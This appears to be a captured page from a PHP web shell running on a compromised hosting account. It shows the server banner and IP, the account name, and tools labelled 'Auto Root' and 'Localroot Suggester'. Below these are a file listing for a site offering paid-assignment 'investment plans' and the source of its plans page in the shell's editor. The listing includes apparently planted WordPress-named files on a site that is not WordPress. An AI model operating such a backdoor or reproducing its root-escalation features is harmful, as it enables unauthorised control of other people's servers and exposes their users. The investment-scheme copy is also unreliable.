Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
assignment.work.zone /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2026-03-13 15:14
admin
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
assets
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
hania
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
includes
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
user
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
.user.ini
578
B
-rw-r--r--
2026-03-13 17:04
add_maintenance_setting.php
669
B
-rw-r--r--
2026-03-12 12:31
check_db.php
161
B
-rw-r--r--
2026-03-12 15:16
check_withdrawals.php
156
B
-rw-r--r--
2026-03-12 15:17
contact.php
6.42
KB
-rw-r--r--
2026-03-28 15:18
database.sql
19.53
KB
-rw-r--r--
2026-03-11 23:07
debug.php
5.09
KB
-rw-r--r--
2026-03-30 15:21
error_log
8.83
KB
-rw-r--r--
2026-03-30 15:27
forgot-password.php
2.16
KB
-rw-r--r--
2026-03-30 15:26
how-it-works.php
1.99
KB
-rw-r--r--
2026-03-11 22:52
index.php
9.37
KB
-rw-r--r--
2026-03-12 00:13
login.php
5.17
KB
-rw-r--r--
2026-03-30 15:28
logout.php
56
B
-rw-r--r--
2026-03-11 23:27
maintenance.php
4.5
KB
-rw-r--r--
2026-03-12 12:39
php.ini
578
B
-rw-r--r--
2026-03-13 17:04
plans.php
2.72
KB
-rw-r--r--
2026-03-12 00:10
register.php
8.79
KB
-rw-r--r--
2026-03-30 15:27
reset-password.php
6.39
KB
-rw-r--r--
2026-03-14 18:08
update_db.php
421
B
-rw-r--r--
2026-03-12 15:17
update_withdrawals.php
417
B
-rw-r--r--
2026-03-12 15:18
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php require_once 'includes/config.php'; require_once 'includes/header.php'; $stmt = $pdo->query("SELECT * FROM plans ORDER BY price ASC"); $plans = $stmt->fetchAll(); ?> <div style="padding-top:100px;"> <section> <h2 class="section-title">Investment Plans</h2> <p style="text-align:center; color:var(--text-muted); margin-top:-30px; margin-bottom:50px;"> Choose a plan that fits your earning goals. Earn daily by simply submitting assignments. </p> <?php if (count($plans) > 0): ?> <div class="grid"> <?php foreach ($plans as $plan): ?> <div class="card <?php echo $plan['is_premium'] ? 'premium-card' : ''; ?>"> <h3><?php echo htmlspecialchars($plan['name']); ?></h3> <div class="price"> <span style="font-size:1.2rem;">Rs</span> <?php echo number_format($plan['price'], 2); ?> </div> <p style="color:var(--text-muted); margin-bottom:15px;"> <?php if ($plan['validity_type'] == 'lifetime') { echo "Lifetime Validity"; } else { echo htmlspecialchars($plan['validity_days']) . " Days Validity"; } ?> </p> <div style="margin-bottom:20px; font-weight:600; color:var(--primary-color);"> Earn Rs <?php echo number_format($plan['assignment_pay'], 2); ?> per assignment </div> <ul style="border-top:1px solid rgba(255,255,255,0.05); padding-top:20px;"> <?php $features = explode("\n", $plan['features']); foreach ($features as $feature): $feature = trim($feature); if (!empty($feature)): ?> <li><?php echo htmlspecialchars($feature); ?></li> <?php endif; endforeach; ?> </ul> <a href="register.php?plan=<?php echo $plan['id']; ?>" class="btn-primary" style="width:100%;">Get Started</a> </div> <?php endforeach; ?> </div> <?php else: ?> <div class="card" style="padding:50px;"> <i class="fas fa-box-open" style="font-size:3rem; color:var(--text-muted); margin-bottom:20px;"></i> <p>No investment plans have been created yet. Please check back soon.</p> </div> <?php endif; ?> </section> </div> <?php require_once 'includes/footer.php'; ?>